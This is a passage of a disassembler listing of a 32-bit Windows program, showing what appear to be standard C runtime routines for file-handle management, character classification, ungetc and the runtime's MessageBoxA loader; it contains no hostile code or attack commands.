loc_40ECD0: ; CODE XREF: sub_40EC7F+3F�j
push ebx
push 0FFFFFFF6h
loc_40ECD3: ; CODE XREF: sub_40EC7F+4A�j
; sub_40EC7F+4F�j
call ds:dword_41D0BC
loc_40ECD9: ; CODE XREF: sub_40EC7F+3A�j
; sub_40EC7F+45�j
mov eax, [edi]
mov [esi+eax], ebx
xor eax, eax
pop ebx
jmp short loc_40ECF9
; ---------------------------------------------------------------------------
loc_40ECE3: ; CODE XREF: sub_40EC7F+8�j
; sub_40EC7F+10�j ...
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_40ECF9: ; CODE XREF: sub_40EC7F+62�j
pop edi
pop esi
retn
sub_40EC7F endp
; =============== S U B R O U T I N E =======================================
sub_40ECFC proc near ; CODE XREF: sub_408A4D+62�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push ebx
xor ebx, ebx
cmp ecx, ebx
push esi
push edi
jl short loc_40ED64
cmp ecx, ds:dword_433C84
jnb short loc_40ED64
mov esi, ecx
and esi, 1Fh
imul esi, 28h
mov eax, ecx
sar eax, 5
lea edi, ds:433CA0h[eax*4]
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_40ED64
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_40ED64
cmp ds:dword_423050, 1
jnz short loc_40ED5A
sub ecx, ebx
jz short loc_40ED51
dec ecx
jz short loc_40ED4C
dec ecx
jnz short loc_40ED5A
push ebx
push 0FFFFFFF4h
jmp short loc_40ED54
; ---------------------------------------------------------------------------
loc_40ED4C: ; CODE XREF: sub_40ECFC+46�j
push ebx
push 0FFFFFFF5h
jmp short loc_40ED54
; ---------------------------------------------------------------------------
loc_40ED51: ; CODE XREF: sub_40ECFC+43�j
push ebx
push 0FFFFFFF6h
loc_40ED54: ; CODE XREF: sub_40ECFC+4E�j
; sub_40ECFC+53�j
call ds:dword_41D0BC
loc_40ED5A: ; CODE XREF: sub_40ECFC+3F�j
; sub_40ECFC+49�j
mov eax, [edi]
or dword ptr [esi+eax], 0FFFFFFFFh
xor eax, eax
jmp short loc_40ED79
; ---------------------------------------------------------------------------
loc_40ED64: ; CODE XREF: sub_40ECFC+B�j
; sub_40ECFC+13�j ...
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], ebx
or eax, 0FFFFFFFFh
loc_40ED79: ; CODE XREF: sub_40ECFC+66�j
pop edi
pop esi
pop ebx
retn
sub_40ECFC endp
; =============== S U B R O U T I N E =======================================
sub_40ED7D proc near ; CODE XREF: sub_408A4D+7�p
; sub_408A4D+2F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40ED9D
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40ED9D: ; CODE XREF: sub_40ED7D+7�j
push esi
xor esi, esi
cmp eax, esi
jl short loc_40EDC6
cmp eax, ds:dword_433C84
jnb short loc_40EDC6
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, ds:dword_433CA0[ecx*4]
add eax, ecx
test byte ptr [eax+4], 1
jnz short loc_40EDEA
loc_40EDC6: ; CODE XREF: sub_40ED7D+25�j
; sub_40ED7D+2D�j
call sub_4057E6
mov [eax], esi
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 9
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EDEA: ; CODE XREF: sub_40ED7D+47�j
mov eax, [eax]
pop esi
retn
sub_40ED7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EDEE proc near ; CODE XREF: sub_408AE1+7F�p
; sub_40A34F+7F�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_421880
call __SEH_prolog4
mov edi, [ebp+arg_0]
mov eax, edi
sar eax, 5
mov esi, edi
and esi, 1Fh
imul esi, 28h
add esi, ds:dword_433CA0[eax*4]
mov [ebp+var_1C], 1
xor ebx, ebx
cmp [esi+8], ebx
jnz short loc_40EE55
push 0Ah
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], ebx
cmp [esi+8], ebx
jnz short loc_40EE49
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jnz short loc_40EE46
mov [ebp+var_1C], ebx
loc_40EE46: ; CODE XREF: sub_40EDEE+53�j
inc dword ptr [esi+8]
loc_40EE49: ; CODE XREF: sub_40EDEE+3F�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40EE85
loc_40EE55: ; CODE XREF: sub_40EDEE+2F�j
cmp [ebp+var_1C], ebx
jz short loc_40EE77
mov eax, edi
sar eax, 5
and edi, 1Fh
imul edi, 28h
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+edi+0Ch]
push eax
call ds:dword_41D168
loc_40EE77: ; CODE XREF: sub_40EDEE+6A�j
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40EDEE endp
; =============== S U B R O U T I N E =======================================
sub_40EE80 proc near ; DATA XREF: seg001:00421898�o
xor ebx, ebx
mov edi, [ebp+8]
sub_40EE80 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40EE85 proc near ; CODE XREF: sub_40EDEE+62�p
push 0Ah
call sub_40591F
pop ecx
retn
sub_40EE85 endp
; =============== S U B R O U T I N E =======================================
sub_40EE8E proc near ; CODE XREF: sub_408BA4+3�p
; sub_40A421+3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, ds:dword_433CA0[ecx*4]
lea eax, [ecx+eax+0Ch]
push eax
call ds:dword_41D16C
retn
sub_40EE8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EEB0 proc near ; CODE XREF: sub_40E072:loc_40E268�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
; FUNCTION CHUNK AT 0040EF8C SIZE 000000BA BYTES
push 18h
push offset dword_4218A0
call __SEH_prolog4
or [ebp+var_1C], 0FFFFFFFFh
xor edi, edi
mov [ebp+var_24], edi
push 0Bh
call sub_405934
pop ecx
test eax, eax
jnz short loc_40EED9
or eax, 0FFFFFFFFh
jmp loc_40F040
; ---------------------------------------------------------------------------
loc_40EED9: ; CODE XREF: sub_40EEB0+1F�j
push 0Bh
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
loc_40EEE4: ; CODE XREF: sub_40EEB0+109�j
mov [ebp+var_28], edi
cmp edi, 40h
jge loc_40F031
mov esi, ds:dword_433CA0[edi*4]
test esi, esi
jz loc_40EFBE
loc_40EEFF: ; CODE XREF: sub_40EEB0+CB�j
mov [ebp+var_20], esi
mov eax, ds:dword_433CA0[edi*4]
add eax, 500h
cmp esi, eax
jnb loc_40EFB2
test byte ptr [esi+4], 1
jnz short loc_40EF78
cmp dword ptr [esi+8], 0
jnz short loc_40EF5B
push 0Ah
call sub_4059F7
pop ecx
xor ebx, ebx
inc ebx
mov [ebp+ms_exc.disabled], ebx
cmp dword ptr [esi+8], 0
jnz short loc_40EF52
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jnz short loc_40EF4F
mov [ebp+var_24], ebx
jmp short loc_40EF52
; ---------------------------------------------------------------------------
loc_40EF4F: ; CODE XREF: sub_40EEB0+98�j
inc dword ptr [esi+8]
loc_40EF52: ; CODE XREF: sub_40EEB0+84�j
; sub_40EEB0+9D�j
and [ebp+ms_exc.disabled], 0
call sub_40EF83
loc_40EF5B: ; CODE XREF: sub_40EEB0+70�j
cmp [ebp+var_24], 0
jnz short loc_40EF78
lea ebx, [esi+0Ch]
push ebx
call ds:dword_41D168
test byte ptr [esi+4], 1
jz short loc_40EF8C
push ebx
call ds:dword_41D16C
loc_40EF78: ; CODE XREF: sub_40EEB0+6A�j
; sub_40EEB0+AF�j ...
add esi, 28h
jmp short loc_40EEFF
sub_40EEB0 endp
; =============== S U B R O U T I N E =======================================
sub_40EF7D proc near ; DATA XREF: seg001:004218C4�o
mov edi, [ebp-28h]
mov esi, [ebp-20h]
sub_40EF7D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40EF83 proc near ; CODE XREF: sub_40EEB0+A6�p
push 0Ah
call sub_40591F
pop ecx
retn
sub_40EF83 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40EEB0
loc_40EF8C: ; CODE XREF: sub_40EEB0+BF�j
cmp [ebp+var_24], 0
jnz short loc_40EF78
mov byte ptr [esi+4], 1
or dword ptr [esi], 0FFFFFFFFh
mov eax, esi
sub eax, ds:dword_433CA0[edi*4]
cdq
push 28h
pop ecx
idiv ecx
mov ecx, edi
shl ecx, 5
add eax, ecx
mov [ebp+var_1C], eax
loc_40EFB2: ; CODE XREF: sub_40EEB0+60�j
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_40F031
inc edi
jmp loc_40EEE4
; ---------------------------------------------------------------------------
loc_40EFBE: ; CODE XREF: sub_40EEB0+49�j
push 28h
push 20h
call sub_40777A
pop ecx
pop ecx
mov [ebp+var_20], eax
test eax, eax
jz short loc_40F031
lea ecx, ds:433CA0h[edi*4]
mov [ecx], eax
add ds:dword_433C84, 20h
loc_40EFE0: ; CODE XREF: sub_40EEB0+151�j
mov edx, [ecx]
add edx, 500h
cmp eax, edx
jnb short loc_40F003
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
and dword ptr [eax+8], 0
add eax, 28h
mov [ebp+var_20], eax
jmp short loc_40EFE0
; ---------------------------------------------------------------------------
loc_40F003: ; CODE XREF: sub_40EEB0+13A�j
shl edi, 5
mov [ebp+var_1C], edi
mov eax, edi
sar eax, 5
mov ecx, edi
and ecx, 1Fh
imul ecx, 28h
mov eax, ds:dword_433CA0[eax*4]
mov byte ptr [eax+ecx+4], 1
push edi
call sub_40EDEE
pop ecx
test eax, eax
jnz short loc_40F031
or [ebp+var_1C], 0FFFFFFFFh
loc_40F031: ; CODE XREF: sub_40EEB0+3A�j
; sub_40EEB0+106�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40F046
mov eax, [ebp+var_1C]
loc_40F040: ; CODE XREF: sub_40EEB0+24�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40EEB0
; =============== S U B R O U T I N E =======================================
sub_40F046 proc near ; CODE XREF: sub_40EEB0+188�p
; DATA XREF: seg001:004218B8�o
push 0Bh
call sub_40591F
pop ecx
retn
sub_40F046 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F04F proc near ; CODE XREF: sub_408C3C+31�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_4218C8
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40F076
call sub_4057D3
mov dword ptr [eax], 9
loc_40F06E: ; CODE XREF: sub_40F04F+4D�j
or eax, 0FFFFFFFFh
jmp loc_40F120
; ---------------------------------------------------------------------------
loc_40F076: ; CODE XREF: sub_40F04F+12�j
xor ebx, ebx
cmp eax, ebx
jl short loc_40F084
cmp eax, ds:dword_433C84
jb short loc_40F09E
loc_40F084: ; CODE XREF: sub_40F04F+2B�j
; sub_40F04F+6D�j
call sub_4057D3
mov dword ptr [eax], 9
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
jmp short loc_40F06E
; ---------------------------------------------------------------------------
loc_40F09E: ; CODE XREF: sub_40F04F+33�j
mov ecx, eax
sar ecx, 5
lea edi, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [edi]
movzx ecx, byte ptr [esi+ecx+4]
and ecx, 1
jz short loc_40F084
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], ebx
mov eax, [edi]
test byte ptr [esi+eax+4], 1
jz short loc_40F102
push [ebp+arg_0]
call sub_40ED7D
pop ecx
push eax
call ds:dword_41D0B8
test eax, eax
jnz short loc_40F0F0
call ds:dword_41D0F0
mov [ebp+var_1C], eax
jmp short loc_40F0F3
; ---------------------------------------------------------------------------
loc_40F0F0: ; CODE XREF: sub_40F04F+94�j
mov [ebp+var_1C], ebx
loc_40F0F3: ; CODE XREF: sub_40F04F+9F�j
cmp [ebp+var_1C], ebx
jz short loc_40F111
call sub_4057E6
mov ecx, [ebp+var_1C]
mov [eax], ecx
loc_40F102: ; CODE XREF: sub_40F04F+80�j
call sub_4057D3
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_40F111: ; CODE XREF: sub_40F04F+A7�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40F126
mov eax, [ebp+var_1C]
loc_40F120: ; CODE XREF: sub_40F04F+22�j
call __SEH_epilog4
retn
sub_40F04F endp
; =============== S U B R O U T I N E =======================================
sub_40F126 proc near ; CODE XREF: sub_40F04F+C9�p
; DATA XREF: seg001:004218E0�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_40F126 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F130 proc near ; CODE XREF: sub_40F17F+21�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp dword ptr [eax+0ACh], 1
jle short loc_40F160
lea eax, [ebp+var_10]
push eax
push 4
push [ebp+arg_0]
call sub_40CA44
add esp, 0Ch
jmp short loc_40F170
; ---------------------------------------------------------------------------
loc_40F160: ; CODE XREF: sub_40F130+1B�j
mov eax, [eax+0C8h]
mov ecx, [ebp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 4
loc_40F170: ; CODE XREF: sub_40F130+2E�j
cmp [ebp+var_4], 0
jz short locret_40F17D
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40F17D: ; CODE XREF: sub_40F130+44�j
leave
retn
sub_40F130 endp
; =============== S U B R O U T I N E =======================================
sub_40F17F proc near ; CODE XREF: seg000:0040901D�p
; seg000:00409256�p ...
arg_0 = dword ptr 4
cmp ds:dword_425DE0, 0
jnz short loc_40F19A
mov eax, [esp+arg_0]
mov ecx, ds:off_423668
movzx eax, byte ptr [ecx+eax*2]
and eax, 4
retn
; ---------------------------------------------------------------------------
loc_40F19A: ; CODE XREF: sub_40F17F+7�j
push 0
push [esp+4+arg_0]
call sub_40F130
pop ecx
pop ecx
retn
sub_40F17F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F1A8 proc near ; CODE XREF: sub_40F1FC+23�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp dword ptr [eax+0ACh], 1
jle short loc_40F1DB
lea eax, [ebp+var_10]
push eax
push 80h
push [ebp+arg_0]
call sub_40CA44
add esp, 0Ch
jmp short loc_40F1ED
; ---------------------------------------------------------------------------
loc_40F1DB: ; CODE XREF: sub_40F1A8+1B�j
mov eax, [eax+0C8h]
mov ecx, [ebp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 80h
loc_40F1ED: ; CODE XREF: sub_40F1A8+31�j
cmp [ebp+var_4], 0
jz short locret_40F1FA
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40F1FA: ; CODE XREF: sub_40F1A8+49�j
leave
retn
sub_40F1A8 endp
; =============== S U B R O U T I N E =======================================
sub_40F1FC proc near ; CODE XREF: seg000:00409846�p
; seg000:0040991E�p
arg_0 = dword ptr 4
cmp ds:dword_425DE0, 0
jnz short loc_40F219
mov eax, [esp+arg_0]
mov ecx, ds:off_423668
movzx eax, byte ptr [ecx+eax*2]
and eax, 80h
retn
; ---------------------------------------------------------------------------
loc_40F219: ; CODE XREF: sub_40F1FC+7�j
push 0
push [esp+4+arg_0]
call sub_40F1A8
pop ecx
pop ecx
retn
sub_40F1FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F227 proc near ; CODE XREF: sub_40F276+21�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp dword ptr [eax+0ACh], 1
jle short loc_40F257
lea eax, [ebp+var_10]
push eax
push 8
push [ebp+arg_0]
call sub_40CA44
add esp, 0Ch
jmp short loc_40F267
; ---------------------------------------------------------------------------
loc_40F257: ; CODE XREF: sub_40F227+1B�j
mov eax, [eax+0C8h]
mov ecx, [ebp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 8
loc_40F267: ; CODE XREF: sub_40F227+2E�j
cmp [ebp+var_4], 0
jz short locret_40F274
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40F274: ; CODE XREF: sub_40F227+44�j
leave
retn
sub_40F227 endp
; =============== S U B R O U T I N E =======================================
sub_40F276 proc near ; CODE XREF: sub_408E42+17�p
; seg000:00408FA3�p ...
arg_0 = dword ptr 4
cmp ds:dword_425DE0, 0
jnz short loc_40F291
mov eax, [esp+arg_0]
mov ecx, ds:off_423668
movzx eax, byte ptr [ecx+eax*2]
and eax, 8
retn
; ---------------------------------------------------------------------------
loc_40F291: ; CODE XREF: sub_40F276+7�j
push 0
push [esp+4+arg_0]
call sub_40F227
pop ecx
pop ecx
retn
sub_40F276 endp
; =============== S U B R O U T I N E =======================================
sub_40F29F proc near ; CODE XREF: seg000:00408FC5�p
; seg000:00409425�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_4]
or ebp, 0FFFFFFFFh
test byte ptr [esi+0Ch], 40h
push edi
jnz loc_40F35C
push esi
call sub_408A20
cmp eax, ebp
pop ecx
mov ebx, offset dword_423BD0
jz short loc_40F2F2
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_40F2F2
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_40F2F4
; ---------------------------------------------------------------------------
loc_40F2F2: ; CODE XREF: sub_40F29F+23�j
; sub_40F29F+2F�j
mov eax, ebx
loc_40F2F4: ; CODE XREF: sub_40F29F+51�j
test byte ptr [eax+24h], 7Fh
jnz short loc_40F33B
push esi
call sub_408A20
cmp eax, ebp
pop ecx
jz short loc_40F333
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_40F333
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_40F335
; ---------------------------------------------------------------------------
loc_40F333: ; CODE XREF: sub_40F29F+64�j
; sub_40F29F+70�j
mov eax, ebx
loc_40F335: ; CODE XREF: sub_40F29F+92�j
test byte ptr [eax+24h], 80h
jz short loc_40F35C
loc_40F33B: ; CODE XREF: sub_40F29F+59�j
call sub_4057D3
xor edi, edi
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
loc_40F355: ; CODE XREF: sub_40F29F+C3�j
; sub_40F29F+CE�j ...
mov eax, ebp
loc_40F357: ; CODE XREF: sub_40F29F+11C�j
pop edi
pop esi
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40F35C: ; CODE XREF: sub_40F29F+F�j
; sub_40F29F+9A�j
mov ebx, [esp+10h+arg_0]
cmp ebx, ebp
jz short loc_40F355
mov eax, [esi+0Ch]
test al, 1
jnz short loc_40F373
test al, al
jns short loc_40F355
test al, 2
jnz short loc_40F355
loc_40F373: ; CODE XREF: sub_40F29F+CA�j
xor edi, edi
cmp [esi+8], edi
jnz short loc_40F381
push esi
call sub_40D4FC
pop ecx
loc_40F381: ; CODE XREF: sub_40F29F+D9�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_40F390
cmp [esi+4], edi
jnz short loc_40F355
inc eax
mov [esi], eax
loc_40F390: ; CODE XREF: sub_40F29F+E7�j
dec dword ptr [esi]
test byte ptr [esi+0Ch], 40h
mov eax, [esi]
jz short loc_40F3A3
cmp [eax], bl
jz short loc_40F3A5
inc eax
mov [esi], eax
jmp short loc_40F355
; ---------------------------------------------------------------------------
loc_40F3A3: ; CODE XREF: sub_40F29F+F9�j
mov [eax], bl
loc_40F3A5: ; CODE XREF: sub_40F29F+FD�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and eax, 0FFFFFFEFh
or eax, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_40F357
sub_40F29F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3BD proc near ; CODE XREF: seg000:00409566�p
; sub_40F4D0+E�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_40F3E1
cmp [ebp+arg_8], ebx
jz short loc_40F3E1
cmp [esi], bl
jnz short loc_40F3E7
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40F3E1
mov [eax], bx
loc_40F3E1: ; CODE XREF: sub_40F3BD+F�j
; sub_40F3BD+14�j ...
xor eax, eax
loc_40F3E3: ; CODE XREF: sub_40F3BD+5A�j
; sub_40F3BD+BB�j ...
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40F3E7: ; CODE XREF: sub_40F3BD+18�j
push [ebp+arg_C]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz short loc_40F419
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40F408
movzx cx, byte ptr [esi]
mov [eax], cx
loc_40F408: ; CODE XREF: sub_40F3BD+42�j
; sub_40F3BD+10B�j
cmp [ebp+var_4], bl
jz short loc_40F414
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40F414: ; CODE XREF: sub_40F3BD+4E�j
xor eax, eax
inc eax
jmp short loc_40F3E3
; ---------------------------------------------------------------------------
loc_40F419: ; CODE XREF: sub_40F3BD+3B�j
lea eax, [ebp+var_10]
push eax
movzx eax, byte ptr [esi]
push eax
call sub_40CA00
test eax, eax
pop ecx
pop ecx
jz short loc_40F4A9
mov eax, [ebp+var_10]
mov ecx, [eax+0ACh]
cmp ecx, 1
jle short loc_40F45F
cmp [ebp+arg_8], ecx
jl short loc_40F45F
xor edx, edx
cmp [ebp+arg_0], ebx
setnz dl
push edx
push [ebp+arg_0]
push ecx
push esi
push 9
push dword ptr [eax+4]
call ds:dword_41D0A0
test eax, eax
mov eax, [ebp+var_10]
jnz short loc_40F46F
loc_40F45F: ; CODE XREF: sub_40F3BD+7B�j
; sub_40F3BD+80�j
mov ecx, [ebp+arg_8]
cmp ecx, [eax+0ACh]
jb short loc_40F48A
cmp [esi+1], bl
jz short loc_40F48A
loc_40F46F: ; CODE XREF: sub_40F3BD+A0�j
cmp [ebp+var_4], bl
mov eax, [eax+0ACh]
jz loc_40F3E3
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_40F3E3
; ---------------------------------------------------------------------------
loc_40F48A: ; CODE XREF: sub_40F3BD+AB�j
; sub_40F3BD+B0�j ...
call sub_4057D3
mov dword ptr [eax], 2Ah
cmp [ebp+var_4], bl
jz short loc_40F4A1
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40F4A1: ; CODE XREF: sub_40F3BD+DB�j
or eax, 0FFFFFFFFh
jmp loc_40F3E3
; ---------------------------------------------------------------------------
loc_40F4A9: ; CODE XREF: sub_40F3BD+6D�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
mov eax, [ebp+var_10]
push 1
push esi
push 9
push dword ptr [eax+4]
call ds:dword_41D0A0
test eax, eax
jnz loc_40F408
jmp short loc_40F48A
sub_40F3BD endp
; =============== S U B R O U T I N E =======================================
sub_40F4D0 proc near ; CODE XREF: sub_40CE5A+18E�p
; sub_40CE5A+1BC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40F3BD
add esp, 10h
retn
sub_40F4D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F4F0 proc near ; CODE XREF: seg000:00409836�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_40F509
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_40F509: ; CODE XREF: sub_40F4F0+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_40F4F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F524 proc near ; CODE XREF: sub_409AB4+15D�p
var_30 = dword ptr -30h
var_20 = byte ptr -20h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
call sub_40518A
xor ebx, ebx
cmp ds:dword_426488, ebx
mov [ebp+var_10], eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
jnz loc_40F5F9
push offset aUser32_dll_0 ; "USER32.DLL"
call ds:dword_41D0E8
mov edi, eax
cmp edi, ebx
jnz short loc_40F564
loc_40F55D: ; CODE XREF: sub_40F524+50�j
xor eax, eax
jmp loc_40F6BD
; ---------------------------------------------------------------------------
loc_40F564: ; CODE XREF: sub_40F524+37�j
mov esi, ds:dword_41D0EC
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi
cmp eax, ebx
jz short loc_40F55D
push eax
call sub_405127
mov [esp+30h+var_30], offset aGetactivewindo ; "GetActiveWindow"
push edi
mov ds:dword_426488, eax
call esi
push eax
call sub_405127
mov [esp+30h+var_30], offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov ds:dword_42648C, eax
call esi
push eax
call sub_405127
mov ds:dword_426490, eax
lea eax, [ebp+var_8]
push eax
call sub_407906
test eax, eax
pop ecx
pop ecx
jz short loc_40F5C7
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40F5C7: ; CODE XREF: sub_40F524+94�j
cmp [ebp+var_8], 2
jnz short loc_40F5F9
push offset aGetuserobjecti ; "GetUserObjectInformationA"
push edi
call esi
push eax
call sub_405127
cmp eax, ebx
pop ecx
mov ds:dword_426498, eax
jz short loc_40F5F9
push offset aGetprocesswind ; "GetProcessWindowStation"
push edi
call esi
push eax
call sub_405127
pop ecx
mov ds:dword_426494, eax
loc_40F5F9: ; CODE XREF: sub_40F524+22�j
; sub_40F524+A7�j ...
mov eax, ds:dword_426494
mov esi, [ebp+var_10]
cmp eax, esi
jz short loc_40F672
cmp ds:dword_426498, esi
jz short loc_40F672
push eax
call sub_405193
pop ecx
call eax
cmp eax, ebx
jz short loc_40F63F
lea ecx, [ebp+var_14]
push ecx
push 0Ch
lea ecx, [ebp+var_20]
push ecx
push 1
push eax
push ds:dword_426498
call sub_405193
pop ecx
call eax
test eax, eax
jz short loc_40F63F
test [ebp+var_18], 1
jnz short loc_40F672
loc_40F63F: ; CODE XREF: sub_40F524+F4�j
; sub_40F524+113�j
lea eax, [ebp+var_C]
push eax
call sub_40793D
test eax, eax
pop ecx
jz short loc_40F65A
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40F65A: ; CODE XREF: sub_40F524+127�j
cmp [ebp+var_C], 4
jb short loc_40F669
or [ebp+arg_8], 200000h
jmp short loc_40F6A3
; ---------------------------------------------------------------------------
